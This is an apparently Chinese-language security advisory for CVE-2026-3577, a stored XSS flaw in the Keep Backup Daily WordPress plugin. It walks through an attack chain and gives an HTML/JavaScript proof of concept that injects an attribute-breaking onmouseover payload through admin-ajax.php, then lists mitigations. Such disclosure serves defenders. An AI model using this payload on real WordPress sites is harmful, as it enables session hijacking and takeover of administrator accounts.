CVE-2026-3577 CVSS 4.4 中危

CVE-2026-3577 WordPress Keep Backup Daily插件存储型XSS漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3577

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Keep Backup Daily WordPress Plugin

漏洞概述

WordPress插件Keep Backup Daily在2.1.2及以下版本中存在存储型XSS漏洞。漏洞源于`update_kbd_bkup_alias`接口的`val`参数输入清理不当。尽管使用了`sanitize_text_field()`过滤，但未对双引号编码，且输出时未调用`esc_attr()`。拥有管理员权限的攻击者可注入恶意脚本，当其他管理员查看备份列表时触发，导致窃取凭证或执行恶意操作。

技术细节

该漏洞核心在于Keep Backup Daily插件对用户输入的过滤不完整。在处理备份标题别名（`val`参数）时，插件仅使用`sanitize_text_field()`去除HTML标签，却保留了双引号等特殊字符。当数据输出到前端时，被直接放置在HTML标签属性中，且未经过`esc_attr()`转义处理。攻击者可构造形如`" onmouseover="alert(1)`的Payload，利用双引号闭合原有属性并插入恶意事件处理器。由于漏洞属于存储型XSS，Payload会保存在数据库中。虽然需要管理员权限才能提交数据，但这允许拥有低级管理员权限的攻击者针对高级管理员进行攻击，一旦目标访问备份列表页面，恶意JavaScript即可在上下文中执行，进而劫持会话或进行后台提权。该漏洞利用了WordPress插件开发中常见的属性上下文转义疏忽，绕过了常规的HTML标签过滤机制。

攻击链分析

STEP 1

1. 凭据获取

攻击者通过钓鱼或其他手段获取WordPress管理员账户的登录凭据。

STEP 2

2. 注入Payload

攻击者登录后台，向`/wp-admin/admin-ajax.php`发送POST请求，参数`action`为`update_kbd_bkup_alias`，在`val`参数中注入包含双引号的恶意XSS代码。

STEP 3

3. 数据存储

服务器端接收请求，由于缺少`esc_attr()`转义，恶意Payload被原样存储在数据库的备份标题字段中。

STEP 4

4. 触发漏洞

当另一位管理员访问插件生成的备份列表页面时，页面在渲染HTML属性时将未转义的Payload输出到浏览器中。

STEP 5

5. 执行攻击

受害管理员浏览器解析恶意HTML属性，执行攻击者注入的JavaScript脚本，可能导致Cookie窃取或后台恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-3577 Stored XSS -->
<!-- Preconditions: Attacker must have Administrator privileges -->
<html>
<body>
<script>
  function exploit() {
    // Payload to inject XSS via HTML attribute context
    // Using double quote to break out of the attribute value
    var xss_payload = '" onmouseover="alert(\'CVE-2026-3577_PoC\')" ';
    
    // Target endpoint for the vulnerable AJAX action
    var target_url = '/wp-admin/admin-ajax.php';
    
    // Parameters required for the request
    var params = 'action=update_kbd_bkup_alias&val=' + encodeURIComponent(xss_payload);
    
    var xhr = new XMLHttpRequest();
    xhr.open('POST', target_url, true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    
    xhr.onreadystatechange = function() {
      if (xhr.readyState === 4 && xhr.status === 200) {
        console.log('Payload injected successfully. Check the backup list page.');
      }
    };
    
    xhr.send(params);
  }
  
  // Execute the exploit
  exploit();
</script>
</body>
</html>

影响范围

Keep Backup Daily <= 2.1.2

防御指南

临时缓解措施

建议暂时禁用Keep Backup Daily插件直至官方发布修复补丁。严格限制WordPress后台管理员账户的访问权限，并启用多因素认证（MFA）。部署Web应用防火墙（WAF）以拦截包含常见XSS攻击特征的请求流量。临时修复可在插件源码中手动添加转义函数，确保输出到HTML属性的数据经过安全处理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表